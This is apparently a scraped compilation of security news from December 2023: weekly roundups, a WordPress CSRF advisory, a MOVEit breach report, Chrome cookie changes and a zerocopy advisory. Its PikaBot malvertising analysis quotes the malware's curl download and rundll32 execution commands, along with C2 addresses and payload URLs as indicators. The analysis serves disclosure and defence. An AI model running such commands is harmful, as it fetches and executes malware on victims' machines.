A list of topics we covered in the week of December 11 to December 17 of 2023

December 15, 2023 - PikaBot, a stealthy malware normally distributed via malspam is now being spread via malicious ads.

December 15, 2023 - Google will soon roll out its Tracking Protection feature to some randomly chosen users in order to prepare for a full deployment.

December 14, 2023 - Apple has plans to make it harder for iPhone thieves to steal your personal information even if they have your device’s passcode.

December 14, 2023 - A recently patched Apache Struts 2 vulnerability has been spotted in worldwide exploitation attempts. Users and admins should update ASAP.

December 14, 2023 - The ALPHV ransomware group appears to be going through some things.

 A week in security (December 11 &#8211; December 17) 

Cross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive.This issue affects Integrate Google Drive: from n/a through 1.3.4.



**Solution**

 Update to fix

Update the WordPress Integrate Google Drive plugin to the latest available version (at least 1.3.5).

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Integrate Google Drive Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 1.3.5.

**Other vulnerabilities in this plugin**

 0 present

 6 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-49769: WordPress Integrate Google Drive plugin <= 1.3.4 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Plus: Hackers reveal flaws in crypto wallets holding $1 billion, a massive breach of Danish electric utilities, and more.

If you work at a spy agency tasked with surveilling the communications of more than 160 million people, it’s probably a good idea to make sure all the data in your possession stays off the open internet. Just ask Bangladesh’s National Telecommunication Monitoring Center, which security researchers found connected to a leaky database that exposed everything from names and email addresses to cell phone numbers and bank account details. The data was likely just used for testing purposes, but WIRED confirmed at least some of the data is linked to real people.

A fight is brewing in the United States Congress over the future of a powerful surveillance program. Section 702 of the Foreign Intelligence Surveillance Act is set to expire at the end of the year. With the December 31 deadline quickly approaching, members of Congress and civil liberties groups are criticizing Section 702 for enabling the “incidental” surveillance of Americans’ communications and “abuses” by the FBI. While a privacy-preserving update to the program has been introduced in Congress, some 702 critics remain concerned that lawmakers will push through reauthorization using other, “must-pass” legislation.

The US Cybersecurity Infrastructure Security Agency this week rolled out its plan for implementing the Biden administration’s executive order on artificial intelligence. CISA’s efforts will focus on defending against weaponized AI and how to incorporate the technology for national security purposes.

Speaking of national security, WIRED spoke this week with Jacob Chansley, aka the Qanon Shaman, who plans to run for the US Congress after becoming a poster child for the US Capitol riot on January 6. Elsewhere in the world of unexpected political news, talk of 9/11 mastermind Osama bin Laden's “Letter to America” spread online this week—and was promptly used by far-right figures to push conspiracy theories.

For the first time, the Signal Foundation has revealed the cost of running its widely popular encrypted messaging app. With annual expenses set to hit $50 million by 2025, the nonprofit expects to rely more heavily on user donations to keep Signal going strong. “By being honest about these costs ourselves, we believe that helps provide a view of the engine of the tech industry, the surveillance business model, that is not always apparent to people,” Meredith Whittaker, president of the Signal Foundation, tells WIRED.

Speaking of surveillance business models, Meta has updated the way two-factor authentication works on Facebook. We’ve got a rundown on what you need to know. Speaking of multifactor authentication, Google has a new Titan Security Key that supports passkeys, pushing the long-used (and misused) password closer to its ultimate demise.

If you’re looking for a long read to while away your weekend, we’ve got you covered. First up, WIRED senior reporter Andy Greenberg reveals the wild story behind the three teenage hackers who created the Mirai botnet code that ultimately took down a huge swath of the internet in 2016. WIRED contributor Garrett Graff pulls from his new book on UFOs to lay out the proof that the 1947 “discovery” of aliens in Roswell, New Mexico, never really happened. And finally, we take a deep dive into the communities that are solving cold cases using face recognition and other AI.

That’s not all. Each week, we round up the security and privacy stories we didn’t report in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The ransomware group known as Scattered Spider has distinguished itself this year as one of the most ruthless in the digital extortion industry, most recently inflicting roughly $100 million in damage to MGM Casinos. A damning new Reuters report—their cyber team has had a busy week— suggests that at least some members of that cybercriminal group are based in the West, within reach of US law enforcement. Yet they haven't been arrested. Executives of cybersecurity companies who have tracked Scattered Spider say the FBI, where many cybersecurity-focused agents have been poached by the private sector, may lack the personnel needed to investigate. They also point to a reluctance on the part of victims to immediately cooperate in investigations, sometimes depriving law enforcement of valuable evidence.

Denmark's critical infrastructure Computer Emergency Response Team, known as SektorCERT, warned in a report on Sunday that hackers had breached the networks of 22 Danish power utilities by exploiting a bug in their firewall appliances. The report, first revealed by Danish journalist Henrik Moltke, described the campaign as the biggest of its kind to ever target the Danish power grid. Some clues in the hackers' infrastructure suggest that the group behind the intrusions was the notorious Sandworm, aka Unit 74455 of Russia's GRU military intelligence agency, which has been responsible for the only three confirmed blackouts triggered by hackers in history, all in Ukraine. But in this case, the hackers were discovered and evicted from the target networks before they could cause any disruption to the utilities' customers.

Last month, WIRED covered the efforts of a whitehat hacker startup called Unciphered to unlock valuable cryptocurrency wallets whose owners have forgotten their passwords—including one stash of $250 million in bitcoin stuck on an encrypted USB drive. Now, the same company has revealed that it found a flaw in a random number generator widely used in cryptocurrency wallets created prior to 2016 that leaves many of those wallets prone to theft, potentially adding up to $1 billion in vulnerable money. Unciphered found the flaw while attempting to unlock $600,000 worth of crypto locked in a client's wallet. They failed to crack it but in the process discovered a flaw in a piece of open-source code called BitcoinJS that left a wide swath of other wallets potentially open to be hacked. The coder who built that flaw into BitcoinJS? None other than Stefan Thomas, the owner of that same $250 million in bitcoin locked on a thumb drive.

_Updated, 12/19/23, 3:10 pm EST: Earlier this month, Reuters temporarily removed the article, "How an Indian startup hacked the world” from its website, pursuant to a preliminary court order issued in New Delhi, India. Reuters said it stands by its reporting and that it plans to appeal the court's decision, which is based on a pending lawsuit. In light of Reuters's actions, WIRED has temporarily removed the link and description of the story in this security roundup._

Cybersecurity Industry Baffled by FBI’s Lack of Action on Ransomware Gang

Plus: Apple tightens anti-theft protections, Chinese hackers penetrate US critical infrastructure, and the long-running rumor of eavesdropping phones crystallizes into more than an urban legend.

A hacker group calling itself Solntsepek, previously linked to the infamous Russian military hacking unit Sandworm, took credit this week for a disruptive attack on the Ukrainian internet and mobile service provider Kyivstar. As Russia’s kinetic war against Ukraine has dragged on, inflicting what the World Bank estimates to be around $410 billion in recovery costs for Ukraine, the country has launched an official crowdfunding platform known as United24 as a means of raising awareness and rebuilding.

Kytch, the small company that aimed to fix McDonald’s notably often-broken ice cream machines, claims it has discovered a “smoking gun” email from the CEO of McDonald’s ice cream machine manufacturer that Kytch's lawyers say suggests an alleged plan to undermine Kytch as a potential competitor. Kytch argues in a recent court filing that the email reveals the real reason why, a couple of weeks later, McDonald’s sent an email to thousands of its restaurant franchisees claiming safety hazards related to Kytch’s ice-cream-machine-whispering device.

WIRED looked at how Microsoft’s Digital Crime Unit has refined a strategy over the past decade that combines intelligence and technical capabilities from Microsoft’s massive infrastructure with creative legal tactics to disrupt both global cybercrime and state-backed actors. And we dove into the controversy over reauthorization of Section 702 surveillance powers in the US Congress.

And there's more. Each week, we round up the security and privacy news we didn’t break or cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

Geofence warrants, which require tech companies to cough up data on everyone in a certain geographic area at a certain time, have become an incredibly powerful tool for law enforcement. Sending a geofence warrant to Google, in particular, has come to be seen as almost an “easy button” among police investigators, given that Google has long stored location data on users in the cloud, where it can be demanded to help police identify suspects based on the timing and location of a crime alone—a practice that has appalled privacy advocates and other critics who say it violates the Fourth Amendment. Now, Google has made technical changes to rein in that surveillance power.

The company announced this week that it would store location history only on users' phones, delete it by default after three months, and, if the user does choose to store it in a cloud account, keep it encrypted so that even Google can't decrypt it. The move has been broadly cheered by the privacy and civil liberties crowds as a long-overdue protection for users. It will also strip law enforcement of a tool it had come to increasingly rely on. Geofence warrants were sent to Google, for instance, to obtain data on more than 5,000 devices present at the storming of the US Capitol on January 6, 2021, but they have also been used to solve far smaller crimes, including nonviolent ones. So much for the “easy button.”

In a different sort of technical move to tighten users' data protections, Apple has added new security features designed to make it harder for thieves to exploit users' sensitive data and accounts. _The Wall Street Journal_ had previously reported on how thieves who merely learned someone's passcode—say, by looking over their shoulder—and then stole their phone could access their online accounts and even make payments to drain their bank balances. Apple has now created a Stolen Device Protection feature that, when enabled, will require you to use a biometric feature like TouchID or FaceID to access certain accounts and phone features, in addition to the passcode that unlocks the phone. For the most sensitive features, like changing passwords or passcodes or turning off Find My, Apple will also force you to wait an hour and authenticate again if the phone isn't in a location the user typically frequents.

The group of Chinese hackers known as Volt Typhoon has rung alarm bells across the cybersecurity industry all year with news of its intrusions targeting power grids and other critical infrastructure in the Pacific region and the US. A new report from _The Washington Post_ offers fresh details of the disturbing mix of networks that the group has breached, including a water utility in Hawaii, an oil and gas pipeline, and a major West Coast port. The hackers haven't actually caused any disruptions, nor have they penetrated the industrial control system side of their targets' networks—the sensitive systems capable of triggering physical effects. But in combination with previous reports of Volt Typhoon's work to plant malware inside electric utilities in the continental US and Guam, the report paints a picture of China's escalating moves to prepare the groundwork for disruption in the event of a crisis, such as an invasion of Taiwan.

The notion that your iPhone or Amazon Echo is quietly listening to your conversations has long been one of the most paranoid suspicions of all technology users—bolstered, of course, by the targeted ads that are often so accurate that they seem to be pulled directly from verbal conversations. This week, that suspicion finally became more than an urban legend when 404 Media reported on an advertising company actively claiming that it can eavesdrop on conversations via those kinds of devices. The company, Cox Media Group, (CMG) brags in its marketing materials that it's already offering the technique to clients and “the ROI is already impressive.” It lists Amazon, Microsoft, and Google as alleged customers. But 404 Media couldn't verify if the technique works as advertised—an enormous “if”—and CMG didn't respond to 404 Media's request for comment.

Google Just Denied Cops a Key Surveillance Tool

PikaBot, a stealthy malware normally distributed via malspam is now being spread via malicious ads.

During this past year, we have seen an increase in the use of malicious ads (malvertising) and specifically those via search engines, to drop malware targeting businesses. In fact, browser-based attacks overall have been a lot more common if we include social engineering campaigns.

Criminals have found success in acquiring new victims thanks to search ads; we believe there are specialized services that help malware distributors and affiliates to bypass Google’s security measures and helping them to set up a decoy infrastructure. In particular, we saw similarities with the malvertising chains previously used to drop FakeBat.

In the past few days, researchers including ourselves have observed PikaBot, a new malware family that appeared in early 2003, distributed via malvertising. PikaBot was previously only distributed via malspam campaigns similarly to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577.

In this blog post, we share details about this new campaign along with indicators of compromise.

**PikaBot via malspam**

PikaBot was first identified as a possible Matanbuchus drop from a malspam campaign by Unit 42 in February 2023. The name PikaBot was later given and attributed to TA577, a threat actor that Proofpoint saw involved in the distribution of payloads such as QakBot, IcedID, SystemBC as well as Cobalt Strike. More importantly, TA577 has been associated with ransomware distribution.

Researchers at Cofense observed a rise in malspam campaigns to deliver both DarkGate and PikaBot, following the takedown of the QakBot botnet in August 2023. A typical distribution chain for PikaBot usually starts with an email (hijacked thread) containing a link to an external website. Users are tricked to download a zip archive containing a malicious JavaScript.

The JavaScript creates a random directory structure where it retrieves the malicious payload from an external website via the _curl_ utility:

"C:\\Windows\\System32\\cmd.exe" /c mkdir C:\\Gkooegsglitrg\\Dkrogirbksri & curl https://keebling\[.\]com/Y0j85XT/0.03471530983348692.dat --output C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll

curl https://keebling\[.\]com/Y0j85XT/0.03471530983348692.dat --output C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll

It then executes the paylod (DLL) via _rundll32_:

rundll32 C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll,Enter

As described by OALabs, PikaBot’s core module is then injected into the legitimate _SearchProtocolHost.exe_ process. PikaBot’s loader also hides its injection by using indirect syscalls, making the malware very stealthy.

**Distribution via malvertising**

The campaign targets Google searches for the remote application AnyDesk. Security researcher Colin Cowie observed the distribution chain and the payload was later confirmed to be PikaBot by Ole Villadsen.

We also saw this campaign via a different ad impersonating the AnyDesk brand, belonging to the fake persona “Manca Marina”:

A decoy website has been setup at _anadesky\[.\]ovmv\[.\]net_:

The download is a digitally signed MSI installer. It’s worth noting that it had zero detection on VirusTotal at the time we collected it. However, the more interesting aspect is how it evades detection upon execution.

The diagram below from JoeSandbox summarizes the execution flow:

**Malvertising similarities with FakeBat**

The threat actors are bypassing Google’s security checks with a tracking URL via a legitimate marketing platform to redirect to their custom domain behind Cloudflare. At this point, only clean IP addresses are forwarded to the next step.

They perform fingerprinting via JavaScript to determine, among other things, if the user is running a virtual machine. Only after the check is successful do we see a redirect to the main landing page (decoy AnyDesk site).

What’s interesting is that there is a second fingerprinting attempt when the user clicks the download button. This is likely to ensure that the download link won’t work in a virtualized environment. In this particular campaign, the threat actor is hosting the MSI installer on Dropbox.

We noticed that previous malvertising chains used the same redirection mechanism via onelink\[.\]me as well as URL structure. These incidents were previously reported to Google and targeted Zoom and Slack search ads:

In some of these instances, we had identified the payload as FakeBat. This is particularly interesting because it points towards a common process used by different threat actors. Perhaps, this is something akin to “malvertising as a service” where Google ads and decoy pages are provided to malware distributors.

**Conclusion**

Several years ago, exploit kits were the primary malware distribution vector via drive-by downloads. As vulnerabilities in the browser and its plugins began to be less effective, threat actors concentrated on spam to target businesses. However, some did continue to target browsers but instead had to rely on social engineering, luring victims with fake browser updates.

With malvertising, we see another powerful delivery vector that does not require the user to visit a compromised site. Instead, threat actors are piggybacking on search engines and simply buyings ads that they know their target will be exposed to. As we may have said before, businesses can prevent this risk by only allowing their end users to install applications via their own trusted repositories.

Malwarebytes detects the malicious MSI installers as well as the web infrastructure used in these malvertising campaigns. We have reported the malicious ads and download URLs to Google and Dropbox respectively.

_Special thanks to Sergei Frankoff, Ole Villadsen, and pr0xylife for their help and feedback._

**Indicators of Compromise**

**Malicious domains**

anadesky\[.\]ovmv\[.\]net
cxtensones\[.\]top

**Dropbox payloads**

dropbox\[.\]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq  
dropbox\[.\]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu  
dropbox\[.\]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1&rlkey=qbtes3fd3v3vtlzuz8ql9t3qj

**PikaBot hashes**

0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5  
da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff  
69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320

**PikaBot C2s**

172\[.\]232\[.\]186\[.\]251  
57\[.\]128\[.\]83\[.\]129  
57\[.\]128\[.\]164\[.\]11  
57\[.\]128\[.\]108\[.\]132  
139\[.\]99\[.\]222\[.\]29  
172\[.\]232\[.\]164\[.\]77  
54\[.\]37\[.\]79\[.\]82  
172\[.\]232\[.\]162\[.\]198  
57\[.\]128\[.\]109\[.\]221

 PikaBot distributed via malicious search ads 

By Waqas
Since its emergence in May 2023, the MOVEit vulnerability has been exploited by the Russian-linked Cl0p ransomware gang,…
This is a post from HackRead.com Read the original post: Delta Dental Hit with 7 Million User Data Breach in MOVEit-Linked Attack

Since its emergence in May 2023, the MOVEit vulnerability has been exploited by the Russian-linked Cl0p ransomware gang, revealing their involvement in the breach.

According to a data breach notification, the Oak Brook, Illinois, United States-based dental insurance provider Delta Dental has fallen prey to a sophisticated cyberattack orchestrated through the exploitation of a **zero-day flaw in MOVEit Transfer**.

The notorious Russian-linked ransomware syndicate, known as **Cl0p**, is behind the breach, compromising the private information of nearly seven million customers. Hackread.com can confirm that the Cl0p ransomware gang has indeed released the entire dataset on its dark web domain, making it available for public download through a torrent.

Screenshot of the Torrent link (Credit: Hackread.com)

Delta Dental’s internal investigation concluded on July 6, has shed light on the severity of the incident. The cybercriminals successfully infiltrated and exfiltrated sensitive data belonging to Delta Dental of California and its affiliated entities on the MOVEit platform during the window between May 27 and May 30.

The severity of the situation prompted the company to promptly file a **breach notification** (PDF) with the Maine Attorney General, officially documenting the security incident on December 14, 2023.

The exposed information encompasses a trove of personal and highly sensitive details, presenting a significant risk to the affected individuals. Among the compromised data are names coupled with a combination of addresses, Social Security numbers, driver’s license numbers, or other state identification numbers, passport details, financial account information, tax identification numbers, individual health insurance policy numbers, and various health-related information.

This breach not only poses a threat to the privacy and security of Delta Dental’s customers but also raises concerns about the potential misuse of the stolen data. With the involvement of the Cl0p ransomware syndicate, known for its aggressive tactics, the aftermath of this breach could extend beyond typical data exposure scenarios.

Delta Dental is now faced with the daunting task of mitigating the fallout from this significant security incident. As the affected customers grapple with the potential ramifications of identity theft and financial fraud, cybersecurity experts emphasize the urgency of implementing robust measures to safeguard sensitive information.

In a comment to Hackread.com, **Claude Mandy**, Chief Evangelist of Data Security at Symmetry Systems, expressed empathy for the victims and cautioned them about potential phishing attacks that they may encounter.

“My thoughts are with the impacted patients from the incident, who are slowly finding out what information has been exposed. While the majority of the information is fungible and easily replaced with little impact, it still requires continual vigilance from the impacted parties to avoid further impact, whether monitoring financial accounts, and credit scores or being extra vigilant for phishing,” said Claude.

The recent data breach is concerning for Delta Dental and its customers. It underscores the importance for companies to promptly apply patches and secure their infrastructure. This breach highlights the exploitation of vulnerabilities in Ipswitch INC’s managed file transfer software, MOVEit Transfer, by groups like Cl0p.

So far, numerous organizations, spanning government agencies, airlines, educational and financial institutions, as well as healthcare providers, have fallen victim to the MOVEit-linked data breach. The compromised data includes sensitive information such as credit card numbers, Personally Identifiable Information (PII), and Social Security Numbers (SSNs).

****_RELATED ARTICLES_****

1.  **900 U.S. Schools Hit by MOVEit Hack, Exposing Student Data**
2.  **Massive MOVEit Hack: 630K+ US Defense Officials’ Emails Breached**
3.  **UK’s Ofcom confirms cyber attack as PoC exploit for MOVEit is released**
4.  **Sony Data Breach via MOVEit Vulnerability Affects Thousands in the US**
5.  **Okta Breach Linked to Employee’s Google Account, Affects 134 Customers**

Delta Dental Hit with 7 Million User Data Breach in MOVEit-Linked Attack

Google will soon roll out its Tracking Protection feature to some randomly chosen users in order to prepare for a full deployment.

Google has announced that it will start rolling its Chrome web browser’s new Tracking Protection feature from January of 2024. Tracking Protection is part of Google’s Privacy Sandbox initiative to phase out third-party cookies. The Tracking Protection feature aims to disable third-party cookies completely in the second half of 2024.

Third-party cookies, often referred to as non-essential cookies, can be used to track visitors as they move from one website to another, with the purpose of creating profiles for personalized ads. But other website features, like authentication and fraud prevention can also depend on them.  

Starting January 4, Google says it will select one percent of Chrome users on desktop and Android at random, and that group will get the option to use the Tracking Protection feature. The chosen users will receive a notification about it when they open Chrome.

The selected Chrome users can do some testing to establish the impact of blocking third-party cookies on their browsing experience. For example, when Tracking Protection is enabled, some websites may not load correctly, so users will also have the option to temporarily re-enable third-party cookies for that specific website.

One significant difference with the existing (largely useless) “Do Not Track” feature is that websites do not have a choice about whether to cooperate with Tracking Protection. Do Not Track is a signal sent by the browser that asks websites to play nicely and not track it. It isn’t effective and there is no way to determine if it’s having the desired effect or not.

Other initiatives by Google in this direction include hiding your IP address. An IP address is the next best thing for tracking users across the internet. Although the IP address is often not limited to one system, they are very often bound to one household. Google’s IP Protection proposal wants to use proxies to hide users’ IP addresses.

It remains to be seen how fruitful these initiatives will be. A few years ago (March 2021), Google ran some tests with a program called Federated Learning of Cohorts (FLoC) which was also intended to replace third-party cookies. But the technology was criticized on privacy grounds and on January 25, 2022, Google officially announced it had ended development of FLoC technologies.

FLoC was replaced by the Topics API, another Privacy Sandbox mechanism designed to preserve privacy while allowing a browser to share information with third parties about a user’s interests.

Meanwhile, regulators are monitoring the tech giant’s initiatives to ensure they don’t give the company an unfair advantage in selling its own ads.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Chrome starts the countdown to the end of tracking cookies 

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

American Fuzzy Lop plus plus 4.09c

Google on Thursday announced that it will start testing a new feature called "Tracking Protection" starting January 4, 2024, to 1% of Chrome users as part of its efforts to deprecate third-party cookies in the web browser.
The setting is designed to limit "cross-site tracking by restricting website access to third-party cookies by default," Anthony Chavez, vice president of Privacy

Google on Thursday announced that it will start testing a new feature called "Tracking Protection" starting January 4, 2024, to 1% of Chrome users as part of its efforts to deprecate third-party cookies in the web browser.

The setting is designed to limit "cross-site tracking by restricting website access to third-party cookies by default," Anthony Chavez, vice president of Privacy Sandbox at Google, said.

The tech giant noted that participants for Tracking Protection will be selected at random and that chosen users will be notified upon opening Chrome on either a desktop or an Android device.

The goal is to restrict third-party cookies (also called "non-essential cookies") by default, preventing them from being used to track users as they move from one website to the other for serving personalized ads.

While several major browsers like Apple Safari and Mozilla Firefox have either already placed restrictions on third-party cookies via features like Intelligent Tracking Prevention (ITP) and Enhanced Tracking Protection in Firefox, Google is taking more of a middle-ground approach that involves devising alternatives where users can access free online content and services without compromising on their privacy.

In mid-October 2023, Google confirmed its plans to "disable third-party cookies for 1% of users from Q1 2024 to facilitate testing, and then ramp up to 100% of users from Q3 2024."

Privacy Sandbox, instead of providing a cross-site or cross-app user identifier, "aggregates, limits, or noises data" through APIs like Protected Audience (formerly FLEDGE), Topics, and Attribution Reporting to help prevent user re-identification.

In doing so, the goal is to block third-parties from tracking user browsing behavior across sites, while still allowing sites and apps to serve relevant ads and enabling advertisers to measure the performance of their online ads without using individual identifiers.

"With Tracking Protection, Privacy Sandbox and all of the features we launch in Chrome, we'll continue to work to create a web that's more private than ever, and universally accessible to everyone," Chavez said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google's New Tracking Protection in Chrome Blocks Third-Party Cookies

The `Ref` methods `into_ref`, `into_mut`, `into_slice`, and `into_slice_mut` are unsound and may allow safe code to exhibit undefined behavior when used with `Ref<B, T>` where `B` is [`cell::Ref`](https://doc.rust-lang.org/core/cell/struct.Ref.html) or [`cell::RefMut`](https://doc.rust-lang.org/core/cell/struct.RefMut.html). Note that these methods remain sound when used with `B` types other than `cell::Ref` or `cell::RefMut`.

See https://github.com/google/zerocopy/issues/716 for a more in-depth analysis.

The current plan is to yank the affected versions soon. See https://github.com/google/zerocopy/issues/679 for more detail.


Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-3mv5-343c-w2qg

**Ref methods into\_ref, into\_mut, into\_slice, and into\_slice\_mut are unsound when used with cell::Ref or cell::RefMut**

Low severity GitHub Reviewed Published Dec 14, 2023 in google/zerocopy • Updated Dec 15, 2023

**Package**

cargo zerocopy (Rust)

**Affected versions**

\>= 0.2.2, < 0.2.9

\>= 0.3.0, < 0.3.2

\= 0.4.0

\>= 0.5.0, < 0.5.2

\>= 0.6.0, < 0.6.6

\>= 0.7.0, < 0.7.31

**Patched versions**

0.2.9

0.3.2

0.4.1

0.5.2

0.6.6

0.7.31

**Description**

Published to the GitHub Advisory Database

Dec 15, 2023

Last updated

Dec 15, 2023

Tag

#google